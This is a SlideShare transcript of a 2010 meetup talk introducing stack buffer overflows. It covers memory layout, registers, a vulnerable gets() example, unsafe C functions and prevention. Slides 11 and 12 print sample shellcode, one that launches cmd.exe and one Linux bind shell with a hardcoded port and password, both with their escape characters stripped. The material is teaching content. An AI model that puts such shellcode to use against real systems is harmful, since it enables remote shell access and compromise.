Your SlideShare is downloading. ×
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Buffer Overflow Demo by Saurabh Sharma

2,486

Published on

Buffer Overflow Demo by Saurabh Sharma @ null Banglore Meet, June, 2010

Buffer Overflow Demo by Saurabh Sharma @ null Banglore Meet, June, 2010

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,486
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
75
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Buffer Overflows
    by: Saurabh Sharma
  • 2. BUFFER
  • 3. Buffer: The memory area where the user input is stored.
    Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.
    Anatomy of Buffer Overflows
  • 4. void get_input() {
    char buf[1024];
    gets(buf);
    }
    void main(intargc, char*argv[]){
    get_input();
    }
    User controls the input. Malicious user can supply the input of more than 500 chars. So what ??
    User can supply a malicious input which can execute some other exe. This can also be your cmd.exe and may lead to the system compromise.
    A small example
  • 5. Text: Contains instructions
    Data: Contains initialized variables
    BSS: Contains uninitialized global and static variables(initialized to 0)
    Heap: Contains dynamic, uninitialized data(malloc())
    Stack: Contains function arguments and local variables
    Memory overview
  • 6. Stack Frame:holds variables and data for function
    Stack grows from higher memory location to lower memory location
    Heap: lower to higher
    Memory overview
  • 7. General purpose: For basic calculations.
    ESI, EDI: Used mostly with arrays
    Flags: Outcome of several instructions set the flags
    Segment: Code, stack, data.
    EBP:Base pointer, points to the beginning of the current stack frame
    ESP: Stack pointer, points to the top of the stack
    EIP: Instruction pointer, points to the next instruction
    REGISTERS
  • 8. Stack is a LIFO data structure. Temporary memory, formed when the function called.
    A new stack frame created when the function is called.
    The return address is saved just above the local variables.
    Stack Layout
    Lower address
    parameters
    Return addr(saved EIP)
    Saved EBP
    Stack grows
    Local variables
    Higher address
  • 9. So, if the EIP can be controlled, the next instruction to be executed can be controlled.
    Stack Layout
    Lower address
    parameters
    Return addr(saved EIP)
    Saved EBP
    Stack grows
    Local variables
    Higher address
  • 10. Machine code which is injected into the overflown buffer
    Does the work for you
    WORK: executing a third program, adding an administrator etc.
    SHELLCODE
  • 11. win32/xp sp2 (En) cmd.exe 23 bytes
    Author : MountassifMoad A.K.A :
    "x8bxecx68x65x78x65" "x20x68x63x6dx64x2e" "x8dx45xf8x50xb8x8D" "x15x86x7Cxffxd0";
    EXAMPLE SHELLCODES(SMALL)
  • 12. BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]=
    "x31xdbx53x43x53x6ax02x89xe1xb0x66xcdx80" "x31xd2x52x66x68xbcx0ax66x6ax02x89xe2x6a" "x10x52x6ax03x89xe1xfexc3xb0x66xcdx80x6a" "x02x6ax03x89xe1xb3x04xb0x66xcdx80x31xc9" "x51x51x6ax03x89xe1xfexc3xb0x66xcdx80x31" "xdbx53x6ax3ax68x50x61x73x73x89xe6x6ax05" "x56x6ax04x89xe1xb3x09xb0x66xcdx80x31xc9" "x31xf6x51x6ax05x52x6ax04x89xe1xb3x0axb0" "x66xcdx80x31xc9x51x6ax72x68x68x61x78x6f" "x89xe7x89xd6x80xc1x05xfcxf3xa6x75xbfx31" "xc9xb3x04xb0x3fxcdx80x41x83xf9x03x75xf6" "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6e" "x89xe3x50x53x89xe1x31xd2xb0x0bxcdx80xb0" "x01xcdx80"
    EXAMPLE SHELLCODES(bigger)
  • 13. DEMO
  • 14. strcpy()
    strcat()
    sprintf()
    scanf()
    sscanf()
    fscanf()
    vfscanf()
    vsprintf
    vscanf()
    vsscanf()
    streadd()
    strecpy()
    strtrns()
    MAJOR SNARES
  • 15. Buffer size must be checked
    Use alternative functions e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src)
    Other protection mechanisms like /GS(stack cookie), ASLR, SafeSEH compilation
    PREVENTION
  • 16. http://www.cccure.org/amazon/idssignature.pdf
    http://www.shell-storm.org/papers/files/539.pdf
    http://c0re.23.nu/~chris/data/bo-2004.pdf
    http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
    REFERENCES
  • 17. ?????????????????
    QUESTIONS

×